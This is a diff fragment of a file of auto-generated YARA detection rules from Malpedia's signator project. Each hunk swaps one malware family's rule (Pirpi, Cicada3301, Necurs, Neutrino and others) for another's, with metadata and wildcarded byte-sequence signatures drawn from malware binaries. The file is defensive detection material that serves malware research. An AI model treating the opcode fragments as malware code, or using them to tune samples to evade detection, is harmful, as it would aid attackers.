+		$sequence_3 = { 448bc3 e8???????? 33c0 c744242801234567 c744242c89abcdef c7442430fedcba98 c744243476543210 }
+		$sequence_4 = { b801000000 488b8c2490000000 4833cc e8???????? 488b9c24d8000000 4881c4a0000000 5f }
+		$sequence_5 = { 41b8000c0000 c744247001000000 48ffc3 4889442478 48894580 c744245001000000 4889442458 }
+		$sequence_6 = { 488bcf 7512 e8???????? 85c0 751e 488d0d6e500300 eb8a }
+		$sequence_7 = { 4983d300 4d034838 4d3b4838 4d894838 4983d300 4983c040 49ffcf }
+		$sequence_8 = { f0ff00 488d4128 41b806000000 488d1560db0100 483950f0 740b 488b10 }
+		$sequence_9 = { 03d8 41bc67666666 41b80d000000 f20f11450a f20f1005???????? 418bc4 4c8d4d90 }
 
 	condition:
-		7 of them and filesize < 2170880
+		7 of them and filesize < 619520
 }
-rule MALPEDIA_Win_Pirpi_Auto : FILE
+rule MALPEDIA_Win_Marap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a7077df7-231e-50c6-a30a-b0c867545de5"
+		id = "b10f821b-8ff2-589d-803b-f9a90d7546d1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pirpi_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.marap_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "e76dba310cd3f8d181253104bae884733437724bbd7b8a3e7170c860a0db32f8"
+		logic_hash = "546aba24f6e8400321dff7dca511f4540ee158508029bfb4a7f44eaf5c6b5908"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90070,32 +90094,32 @@ rule MALPEDIA_Win_Pirpi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bf8 8d4610 50 8d4c2424 6a0c }
-		$sequence_1 = { bf???????? 8bf0 33db c70200000000 f3a7 745c b904000000 }
-		$sequence_2 = { 0f849e000000 8d7c2434 83c9ff 33c0 f2ae f7d1 49 }
-		$sequence_3 = { 8bca 8b5510 83e103 52 f3a4 }
-		$sequence_4 = { 8b542404 57 85d2 c705????????00000000 7461 8bfa }
-		$sequence_5 = { 8bac24f0000000 8d7c241c 2beb 8b07 }
-		$sequence_6 = { 83fbff 742b b941000000 33c0 8d7c2420 85f6 f3ab }
-		$sequence_7 = { ff15???????? 8bf0 85f6 897508 7545 8b5d0c }
-		$sequence_8 = { 81ec10020000 8bd1 b940000000 33c0 57 8dbc2414010000 }
-		$sequence_9 = { 81c41c020000 c3 8bb42430020000 85f6 0f841dffffff b941000000 8d7c2420 }
+		$sequence_0 = { 53 57 52 50 51 68???????? }
+		$sequence_1 = { c1f805 8b048580320110 83e61f c1e606 }
+		$sequence_2 = { 8d3c8580320110 8b07 c1e606 f644300401 7436 833c30ff }
+		$sequence_3 = { 6a01 57 68???????? 89bda8fdffff }
+		$sequence_4 = { 68???????? 8d9662030000 e8???????? 8b3d???????? 83c410 68???????? 68???????? }
+		$sequence_5 = { eb22 8386e41d00000f eb19 8386e41d000010 }
+		$sequence_6 = { 0f848d000000 8bc6 8d5002 668b08 83c002 663bcf 75f5 }
+		$sequence_7 = { 895df8 0f8576ffffff 8bd7 5f 8bc6 5e }
+		$sequence_8 = { 50 8dbeb2010000 57 e8???????? }
+		$sequence_9 = { 6683f858 770f 0fb7c2 0fbe80d8cb0010 83e00f }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Cicada3301_Auto : FILE
+rule MALPEDIA_Win_Snifula_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7338c12c-73b8-5d10-8e46-a50135055df6"
+		id = "afa48786-d5fc-5366-8008-6b70f692e7c3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cicada3301"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cicada3301_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.snifula_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "71afdc3382366bc56a3a7b41e98090049ed0f50bc476acc71b1f38d7b1e1424b"
+		logic_hash = "7c279f7057df8c5886f1d459f9399bd6a55001fc2186a62b783d87332b8a3375"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90109,32 +90133,32 @@ rule MALPEDIA_Win_Cicada3301_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4c8d057fb12e00 4c89d9 4c89d2 e8???????? 4c8d059db12e00 4c89d9 }
-		$sequence_1 = { e8???????? 4531ff 4c89f9 4889f2 e8???????? 31db 4889d9 }
-		$sequence_2 = { f30f6f00 0f104810 0f105020 660f7f842420010000 0f298c2430010000 0f29942440010000 488b542470 }
-		$sequence_3 = { e9???????? 4885c0 0f8499070000 84db 0f85c9020000 488b9c24b0010000 4839cf }
-		$sequence_4 = { e8???????? 49ffcf 4d897e48 4d85ed 0f84e2010000 4c896c2428 0f28442460 }
-		$sequence_5 = { f30f6f8610020000 f30f6f8b08020000 660f70c044 660febc1 f30f7f8308020000 0f1006 0f1103 }
-		$sequence_6 = { eb21 4889de 4c8d0531002c00 4889e9 4889f2 e8???????? e9???????? }
-		$sequence_7 = { ff13 e9???????? 4d85f6 7433 498d4c2408 4c89f0 488b4cc1f8 }
-		$sequence_8 = { e8???????? 0f108424e0000000 0f108c24f0000000 0f10942400010000 0f29442450 0f294c2460 0f29542470 }
-		$sequence_9 = { c1eb10 488d8c2490020000 488d94248b030000 41b8f5000000 e8???????? 4c8b442440 4c8b4c2438 }
+		$sequence_0 = { e8???????? 33f6 8d936c0e0000 6a05 58 50 56 }
+		$sequence_1 = { 57 8d4c2420 e8???????? 8bd8 3bdd 7524 57 }
+		$sequence_2 = { 40 8907 8d442414 50 56 56 8d7904 }
+		$sequence_3 = { 7436 8b4728 a820 7416 ff7710 8b4708 }
+		$sequence_4 = { 8345ec04 3b45e8 7295 eb1b 8b4df8 8b45f4 8b0488 }
+		$sequence_5 = { bf???????? 57 53 ff15???????? 8bf0 85f6 7414 }
+		$sequence_6 = { 7602 8bf0 8b4d10 6a00 56 ff7508 e8???????? }
+		$sequence_7 = { 8bf8 ff35???????? 8b35???????? ffd6 53 89442414 }
+		$sequence_8 = { 6a04 8d45fc 50 6a04 56 68???????? ff7508 }
+		$sequence_9 = { 5e 5b c9 c20400 8d4804 ba1e010000 56 }
 
 	condition:
-		7 of them and filesize < 11247616
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Calmthorn_Auto : FILE
+rule MALPEDIA_Win_Andromut_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cf990769-6e13-5a67-bc05-b21c727d36bf"
+		id = "deb4a424-4b4e-5ea2-908f-5ddc5f18ef00"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.calmthorn_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.andromut_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "a1bc3f3172ae049034dbbb2cc969035914c9181e535af50f1d71d6e16050356b"
+		logic_hash = "230945b6168ef420f0744200cbf464e2eea8368844f9caec3ac8e73f949cddb4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90148,34 +90172,34 @@ rule MALPEDIA_Win_Calmthorn_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb1e 8b95e42fffff 83c201 8b85e82fffff 83d000 8995e42fffff 8985e82fffff }
-		$sequence_1 = { ebba 0fb68d2cfdffff 83f901 7552 c785a0c2ffff00000000 eb0f 8b95a0c2ffff }
-		$sequence_2 = { ebba 0fb695a6fdffff 83fa01 7553 0f57c0 660f13858498ffff eb1e }
-		$sequence_3 = { e8???????? 83c404 398524ecffff 7d20 8b85e4eeffff 83c001 8985e4eeffff }
-		$sequence_4 = { ebba 0fb69568fdffff 83fa01 7552 c785e4e2ffff00000000 eb0f 8b85e4e2ffff }
-		$sequence_5 = { ebba 0fb68d3ffdffff 83f901 7553 0f57c0 660f1385bc4dffff eb1e }
-		$sequence_6 = { e8???????? 83c404 39855cdeffff 7d20 8b8df4f7ffff 83c101 898df4f7ffff }
-		$sequence_7 = { eb02 ebba 0fb68d16fdffff 83f901 7556 0f57c0 660f13859423ffff }
-		$sequence_8 = { ebbb 0fb68d33fdffff 83f901 7552 c785fcc4ffff00000000 eb0f 8b95fcc4ffff }
-		$sequence_9 = { 8b8d5c1bffff 83c101 8b95601bffff 83d200 898d5c1bffff 8995601bffff 83bd601bffffff }
+		$sequence_0 = { e8???????? 8d8da0dfffff 51 6819000200 56 8d4da4 51 }
+		$sequence_1 = { 47 3bfb 72e9 8b75fc 8b45f8 8b7c1018 33db }
+		$sequence_2 = { 8d8db8f9ffff 51 8d8d70f9ffff 51 57 57 }
+		$sequence_3 = { 53 51 ffb5a0f7ffff 8d8590f7ffff b92d57ae5b 0f438590f7ffff }
+		$sequence_4 = { 8a4d08 8d41bf 3c19 7708 0fbed1 83ea41 eb34 }
+		$sequence_5 = { 8d44246c b974723dc5 50 8d84247c030000 50 e8???????? }
+		$sequence_6 = { 49 8bc1 c1e10b c1e805 25ff070000 0bc1 }
+		$sequence_7 = { 8b9d70ffffff 8b856cffffff 03df a801 7415 6aff }
+		$sequence_8 = { b802210000 6689443e16 0fb7443e06 8b75f8 }
+		$sequence_9 = { e8???????? 8be5 5d c3 68c8060000 b8???????? e8???????? }
 
 	condition:
-		7 of them and filesize < 2322432
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Simplefilemover_Auto : FILE
+rule MALPEDIA_Win_Virlock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "01e3a38c-ca1c-54f8-8b63-a6fb5042b331"
+		id = "9f47c27a-c9f5-5a88-9d0b-7ae966c8318a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.simplefilemover"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.simplefilemover_auto.yar#L1-L220"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virlock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.virlock_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "127d7e5e1cb1879a98229e20253c6e3598e5576a92a3becd73c38551f6d4a8f9"
+		logic_hash = "57885374cad55b220d8ca1f9432224bf7f5758a9b4619824c3d2cad7d03a8a3d"
 		score = 75
-		quality = 73
+		quality = 71
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -90187,44 +90211,32 @@ rule MALPEDIA_Win_Simplefilemover_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bfc f3a5 e8???????? 81c420020000 }
-		$sequence_1 = { 7d07 33c0 e9???????? 6820020000 ff15???????? }
-		$sequence_2 = { e8???????? 81c420020000 85c0 7407 68???????? eb05 68???????? }
-		$sequence_3 = { b988000000 8bf3 8bfc f3a5 }
-		$sequence_4 = { 57 668b01 33f6 33db 33ff }
-		$sequence_5 = { 750f c78508daffff00000000 e9???????? 6a04 8d8d54daffff }
-		$sequence_6 = { 3bc3 0f8ec7020000 0145ec 397dec 7416 8b45ec }
-		$sequence_7 = { 7433 8bcb 663d5c00 7503 }
-		$sequence_8 = { 56 8b74241c 57 8a8800010000 8a9001010000 33ff 884c2408 }
-		$sequence_9 = { 8b742424 53 81e1ff000000 55 81e6ff000000 }
-		$sequence_10 = { 3bfb 0f8c54ffffff 8a4c242c 5d 5b 5f }
-		$sequence_11 = { 895df4 eb03 8b7df0 8d4601 be00010000 99 }
-		$sequence_12 = { 8b7c2418 8b5c2428 47 897c2418 0fbfff 3bfb 0f8c54ffffff }
-		$sequence_13 = { 8b7c2424 b940000000 f3a5 83c40c }
-		$sequence_14 = { e8???????? 83c410 e9???????? 83bd24daffff00 7e0c c78508daffff00000000 }
-		$sequence_15 = { 83c102 42 6685c0 75ea 85f6 7417 8b4c2414 }
-		$sequence_16 = { 0f8eda000000 8b4c2408 8b742424 53 }
-		$sequence_17 = { ebca ebc8 ebc6 ebc4 ebc2 }
-		$sequence_18 = { 50 8d85b0ddffff 50 e8???????? 8b45f4 03c0 }
-		$sequence_19 = { 6a00 6a00 6a04 6a00 6a02 6800000040 8d85f8fdffff }
-		$sequence_20 = { 50 ff15???????? 898510daffff 6a00 }
-		$sequence_21 = { 51 8b9554faffff 52 ff15???????? 898508daffff 83bd08daffffff }
+		$sequence_0 = { 81f234ea98fc ba77fa04fa bb5191b6fe e8???????? 81f2fcfd84fd bb9d77e800 81f32dcee8ff }
+		$sequence_1 = { 41 4a 54 52 4a 4b 55 }
+		$sequence_2 = { 68???????? eb0a 68???????? 68???????? e8???????? 83fa00 751b }
+		$sequence_3 = { 49 52 43 52 58 }
+		$sequence_4 = { 3b12 3646 9a19386f50123e 54 0ae7 0220 6f }
+		$sequence_5 = { d0c3 4a 43 d0a90a2bd0f3 }
+		$sequence_6 = { bb666d87fd 83e904 ba0dd2b2fe eb00 83f905 7d74 bb93ec7eff }
+		$sequence_7 = { 6b484768 e4cc 681cafc880 cf 6a78 d6 49 }
+		$sequence_8 = { 70c1 8a6a8f b3f0 46 fd 098f46182e59 53 }
+		$sequence_9 = { 36a25c6a5eac 42 775c 44 e4f2 2b470c d04ba2 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 4202496
 }
-rule MALPEDIA_Win_Snatch_Loader_Auto : FILE
+rule MALPEDIA_Win_Necurs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e84bc4db-d72c-55c7-8127-5b70bf9d85b1"
+		id = "86cbd739-582e-5cdb-a27a-e3c4138c2a5e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.snatch_loader_auto.yar#L1-L176"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.necurs_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "71f941ef8f08c99c9d42e26dfa505e9884dda28bb1bd06c93b12ee312c92bc07"
+		logic_hash = "39922dfc2893e9d4c51db465a227b3ce728857825f7b204e465cc4626e505419"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90238,38 +90250,38 @@ rule MALPEDIA_Win_Snatch_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895dfc e8???????? 8bf0 85f6 744b 33c0 66894606 }
-		$sequence_1 = { eb0e 8d4dfc 51 8d4df4 51 56 }
-		$sequence_2 = { 7505 8b45fc eb0d 53 53 }
-		$sequence_3 = { 57 8bfa 85c0 751d }
-		$sequence_4 = { 8b7dfc eb04 ffd0 8bf8 a1???????? }
-		$sequence_5 = { 8bc8 e8???????? a3???????? 85c0 7403 57 }
-		$sequence_6 = { 8bf8 a1???????? 85c0 7522 6a02 59 }
-		$sequence_7 = { 32c3 43 8802 42 }
-		$sequence_8 = { 76d8 33c0 48 5a 59 5f 5e }
-		$sequence_9 = { 59 5b 5a c9 c20c00 55 8bec }
-		$sequence_10 = { 8bec 83c4f8 53 56 57 51 52 }
-		$sequence_11 = { 0bc0 7454 394508 734f ff7510 }
-		$sequence_12 = { 33d2 33c9 8a0431 0ac0 741f }
-		$sequence_13 = { 3b45fc 773b 8b750c 8b7d10 037508 8bde }
-		$sequence_14 = { 741f 3a0439 7514 41 3b4df8 72ee 8bc2 }
-		$sequence_15 = { 57 56 8b36 56 8b33 33c0 48 }
+		$sequence_0 = { 56 8bf2 ba06e0a636 f7e2 }
+		$sequence_1 = { 13f2 a3???????? 8935???????? 890d???????? 8bc1 }
+		$sequence_2 = { 33d2 030d???????? a3???????? a1???????? }
+		$sequence_3 = { 397508 7604 33c0 eb12 }
+		$sequence_4 = { 890d???????? 8bc1 5e c3 55 8bec }
+		$sequence_5 = { 46 f7f6 8bc2 034508 5e 5d c3 }
+		$sequence_6 = { 0f31 8bc8 a1???????? 56 }
+		$sequence_7 = { 33c0 eb12 e8???????? 2b7508 }
+		$sequence_8 = { 8d85ecfbffff 57 50 e8???????? 83c410 }
+		$sequence_9 = { 33d7 33c1 52 50 }
+		$sequence_10 = { ffd6 8bf8 59 59 85ff 74df }
+		$sequence_11 = { 5e 5f c9 c3 8b35???????? }
+		$sequence_12 = { 99 6848640300 68da279b71 33d7 }
+		$sequence_13 = { 8bc1 8bd7 e9???????? 83caff 8bc2 e9???????? }
+		$sequence_14 = { 57 57 57 8d8574ffffff 50 }
+		$sequence_15 = { 8bc1 0bc7 7409 8bc1 8bd7 e9???????? }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Unidentified_044_Auto : FILE
+rule MALPEDIA_Win_Firechili_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "34c20231-5d6b-58d1-a551-535378ccd58f"
+		id = "c4b311c4-f6ac-5e5a-9826-d5ef4ea0d836"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_044_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.firechili"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.firechili_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "73cc874ec97680c4006726eab010d16567bb76aa0c2f93b41df5ce3208d81ea0"
+		logic_hash = "db458f5c2a3a8ef8f27139a55fa4a245c49e387f1da157602228dcf03106d70c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90283,32 +90295,32 @@ rule MALPEDIA_Win_Unidentified_044_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd6 a1???????? 85c0 75e2 5e c3 a1???????? }
-		$sequence_1 = { 660bfb 66897c0102 8b4c2410 49 894c2410 85c9 }
-		$sequence_2 = { 8d8570feffff 50 6802020000 891d???????? }
-		$sequence_3 = { 83f801 0f85fd000000 8b542418 8d4c2424 }
-		$sequence_4 = { 803d????????00 5f 740d 8b0d???????? 51 }
-		$sequence_5 = { 8b442414 52 50 55 83c8ff }
-		$sequence_6 = { a3???????? 7e0d 6a00 68???????? ff15???????? }
-		$sequence_7 = { 50 ffd7 85c0 7544 8b2d???????? 8b1d???????? 90 }
-		$sequence_8 = { 66c1c208 50 6689542426 ff15???????? 8bf8 83ffff }
-		$sequence_9 = { 55 e8???????? 83c40c 84c0 74a0 8a442413 }
+		$sequence_0 = { eb2d 488b4c2430 8b442440 894110 4533c9 }
+		$sequence_1 = { 4883ec20 488bda 488bf9 ba30000000 33c9 41b873747600 ff15???????? }
+		$sequence_2 = { 4c8d442430 488bcb 41ffd1 eb1b 4c8b05???????? eb23 }
+		$sequence_3 = { 4889bc2488000000 33ff c7450730000000 ba3f000f00 897d67 488d4d77 48897d77 }
+		$sequence_4 = { 4885d2 7509 4883e802 bb05000080 668938 }
+		$sequence_5 = { 0f8489000000 4885db 0f8480000000 488d5318 4032ff 4885d2 7462 }
+		$sequence_6 = { e8???????? 488d0d65370000 ff15???????? ff15???????? 33c0 4881c430020000 }
+		$sequence_7 = { 84c0 0f84ff000000 0fb77c2420 488b742428 8bc7 48d1e8 }
+		$sequence_8 = { 33ff b90d0000c0 4d85d2 0f45cf 7408 488bc2 492bc2 }
+		$sequence_9 = { 4889442420 488d55f7 ff15???????? 85c0 8bd8 0f49df }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 91136
 }
-rule MALPEDIA_Win_Udpos_Auto : FILE
+rule MALPEDIA_Win_Vapor_Rage_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c21182e3-9948-53fb-ba16-989de2eeeef7"
+		id = "1d14d0da-1333-54f1-9dbb-f6aece783656"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.udpos_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vapor_rage_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "fe240fae257bb918a1862a5669b32e668e7cda4beef5a9f9bbf562c291941f24"
+		logic_hash = "4db758774b2d4194695ce32a1e8b4b65a9381f513267f8540ab016f72cc37d62"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90322,32 +90334,32 @@ rule MALPEDIA_Win_Udpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c414 8d55c4 52 ffd7 }
-		$sequence_1 = { 53 56 52 ffd7 }
-		$sequence_2 = { 83c408 3bf3 7ea8 8b5d08 2bde }
-		$sequence_3 = { 8985f4feffff 8985f8feffff 3905???????? 7e09 a1???????? 8b30 eb06 }
-		$sequence_4 = { 7510 c78598feffff01000000 8b9d98feffff 47 83fb01 75b4 85db }
-		$sequence_5 = { 8b8110020000 301408 8b9110020000 0fb6140a }
-		$sequence_6 = { 83c40c 57 6a02 ff15???????? 8d8dd0fdffff 8bf0 }
-		$sequence_7 = { 51 a3???????? e8???????? 83c40c 68ff000000 8d95fcfdffff 52 }
-		$sequence_8 = { 53 e8???????? 83c404 8b95e4fbffff 52 ff15???????? 5b }
-		$sequence_9 = { 83e60f 0fb65c35e8 0fb671fd 8858fd }
+		$sequence_0 = { f2e94e030000 55 8bec 5d e9???????? 55 }
+		$sequence_1 = { 8d450c 50 8b4d08 51 6a02 ff15???????? 85c0 }
+		$sequence_2 = { 6a00 8d55ec 52 8b45d4 }
+		$sequence_3 = { 8d55ec 52 8b45d4 50 6a05 8b4de4 51 }
+		$sequence_4 = { c3 3b0d???????? f27502 f2c3 f2e94e030000 }
+		$sequence_5 = { 6a03 6a00 6a00 0fb755b0 52 }
+		$sequence_6 = { 50 8b4d08 51 6a02 ff15???????? 85c0 }
+		$sequence_7 = { 3b0d???????? f27502 f2c3 f2e94e030000 55 }
+		$sequence_8 = { ff15???????? 8b4df8 81c900010000 894df8 8b55f8 81ca80000000 }
+		$sequence_9 = { 83c404 8945c4 8b45c4 8945d0 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 296960
 }
-rule MALPEDIA_Win_Matanbuchus_Auto : FILE
+rule MALPEDIA_Win_Neutrino_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "14891cee-6fee-5b85-a869-72db3819e8d3"
+		id = "76543c5c-a591-5d27-b69f-6b94d6c2d536"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.matanbuchus_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.neutrino_pos_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "8cc6ad0369ae6a09d94059ca0fd839ca0ba525864e83ed2b19f2484b94f687e7"
+		logic_hash = "46f9a8dea2672570990106785d46980fe0790f0009b06412248bdd52d22cb9a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90361,34 +90373,34 @@ rule MALPEDIA_Win_Matanbuchus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8955ec 0fb745fc 8b4dd8 668b1441 668955f8 eb0f }
-		$sequence_1 = { 035120 8955dc 8b45f4 8b4d08 03481c 894dcc c745f000000000 }
-		$sequence_2 = { 51 b801000000 6bc800 8b5508 0fbe040a 85c0 }
-		$sequence_3 = { 8b55d4 8b048a 034508 8945d0 0fb74df4 0fb755f8 }
-		$sequence_4 = { 41 66894df8 0fb755fc 85d2 }
-		$sequence_5 = { 0fbe1401 33550c 69c293010001 50 b901000000 c1e100 034d08 }
-		$sequence_6 = { eb04 33c0 eb18 eb82 8b4df4 8b55f4 }
-		$sequence_7 = { 81fa4d5a0000 7407 33c0 e9???????? 8b45e8 8b4d08 }
-		$sequence_8 = { ff55f0 6800800000 6a00 8b5508 }
-		$sequence_9 = { 8b55f0 8b4214 8945e8 33c9 66894dfc }
+		$sequence_0 = { 6a61 6689955cffffff 5a 6a6e 5f 6a75 5e }
+		$sequence_1 = { 8b45d8 8d443001 50 53 e8???????? 8bd8 }
+		$sequence_2 = { 56 57 e8???????? 59 59 8d4df8 51 }
+		$sequence_3 = { 51 53 33ff 57 ffd0 85c0 7433 }
+		$sequence_4 = { ff75fc ffd0 8945fc 3bc7 0f8580000000 }
+		$sequence_5 = { 8945e8 83f8ff 0f84a4000000 3bc3 0f849c000000 687823b2ff 56 }
+		$sequence_6 = { 5a 6a61 6689955cffffff 5a 6a6e }
+		$sequence_7 = { 66898d56ffffff 66898d58ffffff 66898d5affffff 66898d5cffffff 66898d5effffff 66898d60ffffff 66898d62ffffff }
+		$sequence_8 = { 58 6a43 8bc8 66898d4effffff 59 6a65 66898d50ffffff }
+		$sequence_9 = { 6a6e 66898558ffffff 58 6a62 6689855affffff 58 }
 
 	condition:
-		7 of them and filesize < 13077504
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Neutrino_Auto : FILE
+rule MALPEDIA_Win_Acronym_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "90362f91-7989-59b7-8491-41ee08cb7ec9"
+		id = "ce514e29-77d6-5ca8-add6-cd76a31812fc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.neutrino_auto.yar#L1-L311"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.acronym_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "a2300db6491e65a144d0716ad0d9afc9f3b5ec715da52155c4f75ceb78588a52"
-		score = 60
-		quality = 43
+		logic_hash = "5cca7d22218319c4f5ca79e1094be5a7a94847bd4819615124c26ef306c59f0d"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -90400,54 +90412,32 @@ rule MALPEDIA_Win_Neutrino_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? c1e010 50 ff15???????? }
-		$sequence_1 = { 50 6a0b 6a07 e8???????? }
-		$sequence_2 = { 50 6a05 6a03 e8???????? }
-		$sequence_3 = { 0404 010404 0202 020402 }
-		$sequence_4 = { 50 6a00 6a00 ff15???????? 8b4dd8 }
-		$sequence_5 = { 010404 0202 020402 0404 0404 0404 }
-		$sequence_6 = { 8b4d0c 894dfc 8b55f4 0fbe02 85c0 7447 8b4df4 }
-		$sequence_7 = { e9???????? 6a01 ff15???????? 85c0 }
